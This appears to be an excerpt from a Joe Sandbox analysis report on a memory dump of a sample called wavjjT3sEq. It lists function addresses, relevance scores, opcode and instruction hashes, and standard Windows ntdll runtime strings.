                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e002b18b94efbc924911e3b894769f6aaf95c3fa11adcf58af8407c261b55945
                                                                                                                                                              • Instruction ID: 8aa3fe67a215e499599dbece5de467ab99add0d63eaf04d8a099c5ba24c08dce
                                                                                                                                                              • Opcode Fuzzy Hash: e002b18b94efbc924911e3b894769f6aaf95c3fa11adcf58af8407c261b55945
                                                                                                                                                              • Instruction Fuzzy Hash: CF90022124150802D1447158841C707404ADBD0601F55C021A0064554DC6168A6567B1
                                                                                                                                                              Function 01963010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 39d70a668e5567f53649b5373b2d4212e9923c18b650e2009e1d63a9b556fe4c
                                                                                                                                                              • Instruction ID: 1306911f0e41a41d968bde14ced3caf9a2e44cbf88bf9469835fe45882479f1b
                                                                                                                                                              • Opcode Fuzzy Hash: 39d70a668e5567f53649b5373b2d4212e9923c18b650e2009e1d63a9b556fe4c
                                                                                                                                                              • Instruction Fuzzy Hash: 0490022120194442D1447258480CB0F81499BE1202F95C029A4196554CC91589555721
                                                                                                                                                              Function 019639B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1424cb7ced1e10318959f5eb7870d9c5a98bb52ada663aa5a9f86b11e0f35521
                                                                                                                                                              • Instruction ID: 72a917bb7599699973a9f2b000238eeda2ab0206b422f38795811f821f544bf5
                                                                                                                                                              • Opcode Fuzzy Hash: 1424cb7ced1e10318959f5eb7870d9c5a98bb52ada663aa5a9f86b11e0f35521
                                                                                                                                                              • Instruction Fuzzy Hash: B890022124555102D154715C440C6168049BBE0201F55C031A0854594DC55589556321
                                                                                                                                                              Function 01962C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                              • Instruction ID: 64dd93b18073fb171142489e2d078bde61a18f686bc14a4a0fe1910d473d5460
                                                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Function 01962890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: f2eb0563d481106e97a5b985ee4f2bb7b61009eead70dc55ee89e8fb1afb2c36
                                                                                                                                                              • Instruction ID: e74de5e02ab319e598a5788a4d1548cbb696e8bf48efe98f86ea3f4d5edf8fd2
                                                                                                                                                              • Opcode Fuzzy Hash: f2eb0563d481106e97a5b985ee4f2bb7b61009eead70dc55ee89e8fb1afb2c36
                                                                                                                                                              • Instruction Fuzzy Hash: 9D51D4B2A00116AFDB11DF9C899097EFBBCBB88241754C529E56DD7641D334DE40CBA1
                                                                                                                                                              Function 019D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: 91126317ac7baef9649076ab94eb5e28c8d9f89d181de17db363d6b70ff7b2f6
                                                                                                                                                              • Instruction ID: 55fe9a7eec25cf2ac3ec531cd9fb7564c1f7b67220f801fef3a92b6110276d5b
                                                                                                                                                              • Opcode Fuzzy Hash: 91126317ac7baef9649076ab94eb5e28c8d9f89d181de17db363d6b70ff7b2f6
                                                                                                                                                              • Instruction Fuzzy Hash: 82511571A00646AECB31DF9DC99097FBBFCEF84201B44C869E99ED7641E674EA408760
                                                                                                                                                              Function 01957630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019946FC
                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01994742
                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01994725
                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01994655
                                                                                                                                                              • ExecuteOptions, xrefs: 019946A0
                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01994787
                                                                                                                                                              • Execute=1, xrefs: 01994713
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                                              • Opcode ID: 0fe686b166840e37684ec5515edf7d9e83eca5131b93a89d51be3ee1619ba7ba
                                                                                                                                                              • Instruction ID: 7d3637f4a1718326971b2f2acb72d19c406c757734a5aecceb98f861ae815324
                                                                                                                                                              • Opcode Fuzzy Hash: 0fe686b166840e37684ec5515edf7d9e83eca5131b93a89d51be3ee1619ba7ba
                                                                                                                                                              • Instruction Fuzzy Hash: 56513931A0121AAEEF15EBE8EC85FAD77ACAF54304F4400A9DA0DB7180D7719B45CF61
                                                                                                                                                              Function 0196B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                              • Instruction ID: ee19f4abbc2c29ff2ff48aeec0ec0b4f81085ba473c007ff7f49f2a9e0818db9
                                                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                              • Instruction Fuzzy Hash: 0E81C230F0524A8EEF258E6CC8517FEBBBDAF45321F18451AD95BE7691E73488408B71
                                                                                                                                                              Function 019D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                                                              • Opcode ID: 4b5f49604b728e689ad5dd78c0e542f8617b866000be49502d6c09696e68c531
                                                                                                                                                              • Instruction ID: 90a4cefdcde9a22895b278d652eccd1ef3ed06bc6186afbe5f47ed3061ee2428
                                                                                                                                                              • Opcode Fuzzy Hash: 4b5f49604b728e689ad5dd78c0e542f8617b866000be49502d6c09696e68c531
                                                                                                                                                              • Instruction Fuzzy Hash: 0421357AE00119ABDB11DF79DC40AEEBBFCFF54654F484116E919E3204E730DA018BA1
                                                                                                                                                              Function 0194F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019902BD
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 0199031E
                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019902E7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                              • Opcode ID: 23e99cd629569d6367df7f72af44d44214c09aa1c9236ab5ab78aac83db85540
                                                                                                                                                              • Instruction ID: 252845fa34aa15af2b669445969e96c2c7c40e0750cf4c7973644951302cab28
                                                                                                                                                              • Opcode Fuzzy Hash: 23e99cd629569d6367df7f72af44d44214c09aa1c9236ab5ab78aac83db85540
                                                                                                                                                              • Instruction Fuzzy Hash: 02E1AD706047429FEB25CF2CC885F2ABBE8BF84314F180A59F5A98B2E1D774D945CB52
                                                                                                                                                              Function 0195B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0199728C
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 019972C1
                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01997294
                                                                                                                                                              • RTL: Resource at %p, xrefs: 019972A3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                              • Opcode ID: 92580e12b59115f8cddc53472d9b2888d2599b895d39298fc630cfb1689195c0
                                                                                                                                                              • Instruction ID: 69fc7be00a60f2fc1720073e6e7d7d0d53e4b976a54f69c92d862ebdf710b2ee
                                                                                                                                                              • Opcode Fuzzy Hash: 92580e12b59115f8cddc53472d9b2888d2599b895d39298fc630cfb1689195c0
                                                                                                                                                              • Instruction Fuzzy Hash: D841F431710206ABDB25CE69CC41F6ABBA5FF94711F100619FD5DA7240DB21E816CBD1
                                                                                                                                                              Function 019D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                                              • Opcode ID: b8094a3e59f775e1bd1e9a8b6447ce3a519aefc32447f6541c3479f2443b6238
                                                                                                                                                              • Instruction ID: e7326a50f30fab4e9343e4f6e6650b9cf340a6c4700cda8d6cc20398ee204d11
                                                                                                                                                              • Opcode Fuzzy Hash: b8094a3e59f775e1bd1e9a8b6447ce3a519aefc32447f6541c3479f2443b6238
                                                                                                                                                              • Instruction Fuzzy Hash: 8B317376A002199FDB20DF29CC40BEEB7BCAB54611F444556E94DE3200EF309A448BA0
                                                                                                                                                              Function 01929126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $$@
                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                              • Opcode ID: 472c6fc72625a01aecb6c759ecbd1126589f2ee162b712212acdfa8d07656fd8
                                                                                                                                                              • Instruction ID: 85ee35552164863a98d0889c21608f8919eaa0759398bd95f96fd794c3c5e0c6
                                                                                                                                                              • Opcode Fuzzy Hash: 472c6fc72625a01aecb6c759ecbd1126589f2ee162b712212acdfa8d07656fd8
                                                                                                                                                              • Instruction Fuzzy Hash: A9811975D002799BDB31DB54CC44BEABAB8AF49714F1041EAEA1DB7240D7709E85CFA0
                                                                                                                                                              Function 019ACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 019ACFBD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                                                              • String ID: @$@4Qw@4Qw
                                                                                                                                                              • API String ID: 4062629308-2383119779
                                                                                                                                                              • Opcode ID: 9938afca379be3cb8d1f71a1816f923f6521a913f4f963022d04871ada954842
                                                                                                                                                              • Instruction ID: 96a7fed9ebe167b10b79ced584561e20a320a0f062dbca1561162129e699c918
                                                                                                                                                              • Opcode Fuzzy Hash: 9938afca379be3cb8d1f71a1816f923f6521a913f4f963022d04871ada954842
                                                                                                                                                              • Instruction Fuzzy Hash: 4A41E475940225EFDB21DFE9C840AADBBF8FF98B10F00442AE909DB254D734D905CBA1